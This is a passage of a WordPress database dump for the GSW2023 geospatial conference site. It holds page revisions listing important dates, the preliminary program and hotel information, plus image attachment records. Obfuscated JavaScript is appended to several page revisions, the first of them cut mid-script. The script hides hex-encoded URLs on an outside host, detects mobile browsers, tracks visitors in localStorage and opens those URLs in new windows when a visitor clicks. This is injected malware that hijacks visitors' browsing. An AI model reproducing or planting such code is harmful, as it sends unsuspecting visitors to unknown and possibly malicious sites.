_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2022-11-11 16:21:33','2022-11-11 16:21:33','',2685,'https://gsw2023.com/?p=3290',0,'revision','',0),
(3291,1,'2022-11-11 16:37:06','2022-11-11 16:37:06','','pexels-alphatradezone-5833807','','inherit','open','closed','','pexels-alphatradezone-5833807','','','2022-11-11 16:37:06','2022-11-11 16:37:06','',2654,'https://gsw2023.com/wp-content/uploads/2022/11/pexels-alphatradezone-5833807.jpg',0,'attachment','image/jpeg',0),
(3292,1,'2022-11-11 16:38:45','2022-11-11 16:38:45','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong>SPRS Geospatial Week: 2-7 September 2023</strong></h5>\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6><strong>Conference web site and Call for papers: March 2022</strong></h6>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<h5></h5>\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Paper submissions</strong></h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Full paper Author notification: May 2023</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Camera ready paper submission: July 2023</strong></h6>\r\n</li>\r\n</ul>\r\n<h5></h5>\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Registration deadlines</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Early bird registration deadline: May 1, 2023</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Late registration deadline: July 1, 2023</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2022-11-11 16:38:45','2022-11-11 16:38:45','',2654,'https://gsw2023.com/?p=3292',0,'revision','',0),
(3293,1,'2022-11-11 16:51:33','2022-11-11 16:51:33','','pexels-karolina-grabowska-6328840','','inherit','open','closed','','pexels-karolina-grabowska-6328840','','','2022-11-11 16:51:33','2022-11-11 16:51:33','',2654,'https://gsw2023.com/wp-content/uploads/2022/11/pexels-karolina-grabowska-6328840.jpg',0,'attachment','image/jpeg',0),
(3294,1,'2022-11-11 16:54:27','2022-11-11 16:54:27','','imd','','inherit','open','closed','','imd','','','2022-11-11 16:54:27','2022-11-11 16:54:27','',2654,'https://gsw2023.com/wp-content/uploads/2022/11/imd.jpg',0,'attachment','image/jpeg',0),
(3295,1,'2022-11-11 17:00:08','2022-11-11 17:00:08','','r2','','inherit','open','closed','','r2','','','2022-11-11 17:00:08','2022-11-11 17:00:08','',2638,'https://gsw2023.com/wp-content/uploads/2022/11/r2.jpg',0,'attachment','image/jpeg',0),
(3296,1,'2022-11-11 17:01:32','2022-11-11 17:01:32','','r2','','inherit','open','closed','','r2-2','','','2022-11-11 17:01:32','2022-11-11 17:01:32','',2638,'https://gsw2023.com/wp-content/uploads/2022/11/r2-1.jpg',0,'attachment','image/jpeg',0),
(3297,1,'2022-11-11 17:03:13','2022-11-11 17:03:13','','r2','','inherit','open','closed','','r2-3','','','2022-11-11 17:03:13','2022-11-11 17:03:13','',2638,'https://gsw2023.com/wp-content/uploads/2022/11/r2-2.jpg',0,'attachment','image/jpeg',0),
(3298,1,'2022-11-11 17:06:17','2022-11-11 17:06:17','[vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: left;\">Preliminary Program</h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2672\" img_size=\"1224x511\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n\r\n<style>\r\n			.gap-10 {<br />				width:100%;<br />				height:20px;<br />			}<br />			.gap-50 {<br />				width:100%;<br />				height:50px;<br />			}<br />			.gap-100 {<br />				width:100%;<br />				height:130px;<br />			}<br />		</style>\r\n<div class=\"gap-10\"></div>\r\n<h4 style=\"color: red;\">Tutorials</h4>\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6><strong>The GSW2023 will offer at least 4 tutorials on September 2, 2023. The tutorials will cover the state of the art and future trends in the Geospatial technologies and applications. The tutorial program will be announced soon.</strong></h6>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<div class=\"gap-50\"></div>\r\n<h4 style=\"color: red;\">Instruction for Oral Presentations</h4>\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6><strong>More instructions will be announced once the program in complete in May 2023.</strong></h6>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Program','','inherit','closed','closed','','2669-revision-v1','','','2022-11-11 17:06:17','2022-11-11 17:06:17','',2669,'https://gsw2023.com/?p=3298',0,'revision','',0),
